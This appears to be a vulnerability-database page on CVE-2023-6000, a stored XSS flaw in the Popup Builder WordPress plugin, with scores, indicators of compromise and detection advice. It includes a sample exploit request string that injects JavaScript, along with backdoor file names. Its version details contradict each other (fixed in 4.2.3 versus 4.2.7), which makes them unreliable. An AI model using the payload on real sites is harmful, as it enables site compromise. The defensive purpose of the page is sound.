cbcvebase.
CVE-2023-6000
published 2024-01-01

CVE-2023-6000: The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which…

PriorityP181medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
2.00%
78.3th percentile
The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.

Affected

2 ranges
VendorProductVersion rangeFixed in
googlechrome_chrome
sygnoospopup_builder< 4.2.34.2.3

Detection & IOCsextracted from sources · hover to see the quote

domainttincoming.traveltraffic[.]cc
domainhost.cloudsonicwave[.]com
urlhxxp://ttincoming.traveltraffic[.]cc/?traffic
filenamewp-felody.php
pathwp-blog-header.php
commandsgpb-is-preview=1&post_ID={{popup_id}}&sgpb-type=html&sgpb-WillOpen=alert('document.domain');
otherfofa-query: body="/wp-content/plugins/popup-builder"
otherpublicwww-query: "/wp-content/plugins/popup-builder/"
  • Monitor the 'wp_postmeta' database table for malicious JavaScript injected via Popup Builder's Custom JavaScript or Custom CSS sections.
  • Detect malicious event handler injections targeting Popup Builder plugin events: 'sgpb-ShouldOpen', 'sgpb-ShouldClose', 'sgpb-WillOpen', 'sgpbDidOpen', 'sgpbWillClose', and 'sgpb-DidClose'.
  • Detect exploitation attempts via unauthenticated POST requests containing 'sgpb-is-preview=1' and 'sgpb-WillOpen' parameters with JavaScript payloads.
  • Look for the presence of the rogue plugin file 'wp-felody.php' on the filesystem, which serves as the main backdoor dropped after initial compromise.
  • Check for unauthorized modifications to wp-blog-header.php as a secondary infection indicator used to inject the JavaScript backdoor.
  • Detect the 'sgpbWillOpen' event being hijacked in the site's database as an indicator of Balada Injector compromise.
  • Alert on admin-related cookie checks in injected scripts, which attackers use to load additional script sets for backdoor deployment.
  • ·The vulnerability affects Popup Builder versions 4.2.3 and older; version 4.2.7 is the patched release addressing CVE-2023-6000.
  • ·At least 80,000 active sites still use Popup Builder 4.1 and older, meaning the attack surface remains large and scanning for vulnerable installs is warranted.
  • ·Infection removal requires deleting malicious entries from Popup Builder's custom sections AND scanning for hidden backdoors to prevent reinfection.

CVSS provenance

nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vulncheck6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.